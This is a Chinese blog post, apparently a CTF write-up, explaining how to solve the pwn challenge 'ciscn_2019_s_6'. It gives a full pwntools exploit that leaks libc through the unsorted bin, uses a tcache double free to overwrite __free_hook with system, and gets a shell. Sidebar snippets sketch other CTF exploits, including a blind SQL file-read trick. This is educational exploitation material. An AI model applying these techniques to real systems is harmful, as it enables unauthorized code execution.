ciscn_2019_s_6

于 2021-06-19 00:35:43 发布
阅读量359 收藏 1
点赞数
分类专栏: pwn 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xieyichensss/article/details/118035759
版权

这道题好坑呜呜。
远程没有doubel free检查,而本地有。
所以我tmd调了一天的脚本
这里我就简单说下思路吧:能做到这道题的师傅都很强

1.保护全开,没有后门函数,就想到改malloc_hook或者free_hook为system函数或者onegadget,这道题的远程没有double free检查。
2.我们要先泄露libc基址,需要用unsorted_bin头为main_arena+88计算。
3.然后就有很多方法getshell了,如1所述。用double free来add堆块到free_hook,在free_hook内填入system地址,然后free的时候会调用system函数。
exp

from pwn import *
binary='./ciscn_s_6'
#io=remote('node3.buuoj.cn',26916)
io=process(binary)
elf=ELF(binary)
# context.log_level='debug'

def add(size,name,call):
        io.sendlineafter('choice:','1')
        io.sendlineafter('name',str(size))
        io.sendlineafter('name:',name)
        io.sendlineafter('call:',call)

def show(index):
        io.sendlineafter('choice:','2')
        io.sendlineafter('index:',str(index))

def delete(index):
        io.sendlineafter('choice:','3')
        io.sendlineafter('index:',str(index))

#leak libcbase
add(0x80,'aaaa','bbbb')#0
add(0x80,'a','a')#1
add(0x20,'b','b')#2
add(0x20,'/bin/sh\x00','c')#3

for i in range(7):
        delete(0)

delete(1)
show(1)
unsortedbin = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
success('unsortedbin = '+hex(unsortedbin))
libcbase = unsortedbin - 0x3ebca0
success('libcbase = '+hex(libcbase))
libc = ELF('./libc-2.27_64.so')
system = libcbase + libc.sym['system']
free_hook = libcbase + libc.sym['__free_hook']

delete(2)
delete(2)

add(0x20,p64(free_hook),'b')
add(0x20,'c','d')
add(0x20,p64(system),'c')

delete(3)
io.interactive()

delete(3),因为3内填入了’/bin/sh’,所以会getshell。。。。。

eeeeeeeeeeeeeeeea
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ciscn_2019_s_6(uaf)
m0_51251108的博客
11-16 358
ciscn_2019_s_6: 保护全开 漏洞分析: 指针未清零,存在uaf 大致步骤: 利用unsortbin泄露libc,doublefree劫持free_hook为system exp: from pwn import * local_file = './ciscn_s_6' local_libc = './libc-2.27.so' remote_libc = './libc-2.27.so' select = 1 if select == 0: r = process(local_
ciscn_2019_ne_6(指针未初始化漏洞)
seaaseesa的博客
06-11 579
ciscn_2019_ne_6(指针未初始化漏洞) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,在delete功能里,ptr指针存在未初始化的漏洞,因此其ptr的值可以通过其他函数来控制,造成任意地址free。 我们可以利用check函数来控制ptr未初始化之前的值 然后构造double free,劫持free_hook即可。 #coding:utf8 from pwn import * #sh = process('./ciscn_2019_ne_6') sh =
ciscn_final_6
seaaseesa的博客
06-11 395
ciscn_final_6 首先,检查一下程序的保护机制 然后,我们IDA分析一下,在store_game函数里的getInput存在null off by one漏洞 常规的null off by one漏洞,只是本题逻辑复杂了一点,需要精心构造一下。 #coding:utf8 from pwn import* #sh = process('./ciscn_final_6') sh = remote('node3.buuoj.cn',27827) libc = ELF('/lib/x8
ciscn2019 华东南赛区线下赛WEB第一题
CODER的博客
06-27 1251
题目过滤了union 和大量的sql函数,本意是想让人读文件,当时心太急了没做出来,现在复习一下,脚本很简单,利用的是ascii的字符串比较 如 select load_file('/flag')>='A' select load_file('/flag')>='AB' select load_file('/flag')>='ABC' select load_file('/fla...
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
ciscn_2021_game
06-23
2021年国赛的pwn题,虚拟机类型的题目,分析起来比较有难度。
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
ciscn_2021_lonelywolf.zip
05-17
【标题解析】:“ciscn_2021_lonelywolf.zip”这个文件名暗示了这是一个与2021年全国大学生信息安全竞赛相关的资源,其中“ciscn”可能代表了“Chinese Internet Security Contest”,而“lonelywolf”可能是该竞赛...
CISCN2019 web writeup
stepone4ward的博客
04-25 1969
记录一下萌新的第一次CISCN之旅,这次和队友一起完成了两道web题目(虽然第二题没有什么输出),这次的web题目质量很高,接下来是我对这次比赛解题过程的记录~ web1 访问index.php,可以看到如下界面 右键查看页面源代码 得到了两个提示 1.index.php中可能存在有文件包含的漏洞 2.hint.php存在有提示 首先利用php://filter访问hint.php,修改url...
BUUCTF-PWN刷题记录-8
weixin_44145820的博客
04-16 893
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
ciscn_2019_s_4
doudoudedi
01-26 992
可以看到有栈溢出的漏洞能过控制执行流 exp: #!/usr/bin/python2 from pwn import * from LibcSearcher import * local=0 if local==1: p=process('./ciscn_s_4') elf=ELF('./ciscn_s_4') #libc=elf.libc else: p=remo...
【pwn】ciscn_2019_s_3
Nothing
12-14 4511
这题是全国大学生信息安全竞赛的一道线下半决赛题目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往栈上写数据(0x400),从栈上读数据(0x30),存在栈溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
[BUUCTF]PWN6——ciscn_2019_c_1
mcmuyanga的博客
08-25 6900
[BUUCTF]PWN6——ciscn_2019_c_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_c_1 步骤: 例行检查,64位,开启了nx保护 nc一下,看看输入点的字符串,三个选项加密、解密、退出 用64位ida打开,先是shift+f12查看一下程序里的字符串 没有发现system函数和字符串“bin/sh”,先根据输入点的字符串查看一下主要函数 就像一开始说的程序的功能就是加密和解密,看伪代码可以知道,只有选1的时候才会调用encrypt()
ciscn_2019_sw_5(tcache下delete次数限制时的巧妙利用手法)
seaaseesa的博客
05-01 714
ciscn_2019_sw_5(tcache下delete次数限制时的巧妙利用手法) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,仅两个功能 其中,delete功能只能用3次,delete功能没有清空指针,存在double free漏洞。 Add功能,size不可控,结尾printf可以输出堆内容。 我们可以利用add结尾的printf输出,main_are...
BUUCTF-PWN ciscn_2019_final_5(临界条件错误,劫持GOT表项)
weixin_44145820的博客
04-14 985
目录题目分析漏洞分析漏洞利用Exp 题目分析 例行安全检查 没有PIE,方面调试 partial relro意味着这题应该直接改GOT表就能做 菜单: 没有show功能,可以考虑吧某个函数(比如free的GOT)改为puts@plt 可以申请17个chunk,编号为0-16 每次分配结束后会显示分配内存的低12bits 而本题中还有一个特殊的地方,就是content数组(0x6020e0)...
CISCN2019 华北赛区 Day2 Web1
kid的博客
09-09 1640
CISCN2019 华北赛区 Day2 Web1 前言 最近太懒一直没有怎么学习,今天把《轮到你了》结局看了也极为失望,作为黑岛的舔狗我决定好好刷题提高自己,不然都没有实力去当舔???? (当好舔????真不容易) 打开大佬的博客发现好多新的题和环境…好吧,一道一道来吧 感谢大佬提供的环境:https://github.com/glzjin/CISCN_2019_northern_China_day2_we...
ciscn_2019_sw_7
seaaseesa的博客
05-01 533
ciscn_2019_sw_7 首先检查一下程序的保护机制 然后,我们用IDA分析一下,最多创建10个堆,并且size不能超过0x60 Delete功能没有清空指针,因此可以double free。 由于size受限制,因此我们需要伪造一个unsorted bin范围的chunk,glibc版本2.27,存在tcache,因此,我们还要先攻击tcache bin表头,篡改对应的...
ciscn_2019_c_1
最新发布
09-12
根据您提供的引用内容和,题目"ciscn_2019_c_1"是一个涉及到fastbin堆漏洞利用的题目。fastbin是一个堆区的数据结构,用于存储小于等于64字节的空闲块。这个题目的漏洞利用难度不大,适合初学者练习。 根据的代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值